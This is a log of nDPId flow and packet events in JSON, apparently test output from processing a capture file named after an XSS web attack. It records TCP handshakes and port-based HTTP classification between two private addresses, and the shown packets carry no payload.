-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347699724,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347699724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2NAAD4Gcm2sEAABwKgKMupUAFDv6uGsAAAAAKACchDuvAAAAgQFtAQCCAoBO7LPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":2,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6lS1E1w77+rhraAScSBWIwAAAgQFtAQCCAoD5YREATuyzwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":3,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2RAAD4GcnSsEAABwKgKMupUAFDv6uGttRNcPIAQAOX1KgAAAQEICgE7ss8D5YRE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347702287,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347702287,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dHpAAD4GUVasEAABwKgKMupuAFBhicEqAAAAAKACchCbBQAAAgQFtAQCCAoBO7VQAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6m4\/xiwDYYnBK6AScSClcAAAAgQFtAQCCAoD5YbFATu1UAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":3,"flow_last_seen":1499347702288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347702288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dHtAAD4GUV2sEAABwKgKMupuAFBhicErP8YsBIAQAOVEeAAAAQEICgE7tVAD5YbF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347703726,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347703726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80EJAAD4G9Y2sEAABwKgKMup8AFAHaGb6AAAAAKACchBN4QAAAgQFtAQCCAoBO7a4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":2,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6nwCGRKtB2hm+6AScSCt5wAAAgQFtAQCCAoD5YgtATu2uAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":3,"flow_last_seen":1499347703727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347703727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00ENAAD4G9ZSsEAABwKgKMup8AFAHaGb7AhkSroAQAOVM7wAAAQEICgE7trgD5Ygt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347705116,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347705116,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oq5AAD4GIyKsEAABwKgKMuqKAFDjSRq9AAAAAKACchC80wAAAgQFtAQCCAoBO7gTAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":2,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6oqWCrpo40kavqAScSDf0QAAAgQFtAQCCAoD5YmIATu4EwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6174,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":3,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oq9AAD4GIymsEAABwKgKMuqKAFDjSRq+lgq6aYAQAOV+2QAAAQEICgE7uBMD5YmI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347706399,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347706399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F3NAAD4Grl2sEAABwKgKMuqYAFBMGa4nAAAAAKACchC\/SgAAAgQFtAQCCAoBO7lUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":2,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6pjZqykETBmuKKAScSAuywAAAgQFtAQCCAoD5YrJATu5VAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":3,"flow_last_seen":1499347706400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347706400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F3RAAD4GrmSsEAABwKgKMuqYAFBMGa4o2aspBYAQAOXN0gAAAQEICgE7uVQD5YrJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347709252,"flow_last_seen":1499347709252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709252,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1499347709252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u61AAD4GCiOsEAABwKgKMuq0AFAeNwewAAAAAKACchCQvwAAAgQFtAQCCAoBO7wdAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":2,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6rSwITsWHjcHsaAScSAU7wAAAgQFtAQCCAoD5Y2SATu8HQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":3,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347709253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u65AAD4GCiqsEAABwKgKMuq0AFAeNwexsCE7F4AQAOWz9QAAAQEICgE7vB4D5Y2S"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nw9AAD4GJsGsEAABwKgKMurmAFCpjSAeAAAAAKACchDp1AAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81Z1AAD4G8DKsEAABwKgKMuroAFDnlWqMAAAAAKACchBhXAAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6219,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ui8Jpzg55VqjaAScSB0yAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6220,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6uYE2QpnqY0gH6AScSBHCAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01Z5AAD4G8DmsEAABwKgKMuroAFDnlWqNvCac4YAQAOUTzwAAAQEICgE7vxID5ZCG"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nxBAAD4GJsisEAABwKgKMurmAFCpjSAfBNkKaIAQAOXmDgAAAQEICgE7vxID5ZCG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347713588,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347713588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1499347713588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P+JAAD4Ghe6sEAABwKgKMur6AFB3+v+7AAAAAKACchA6bgAAAgQFtAQCCAoBO8BZAAAAAAEDAwc="} 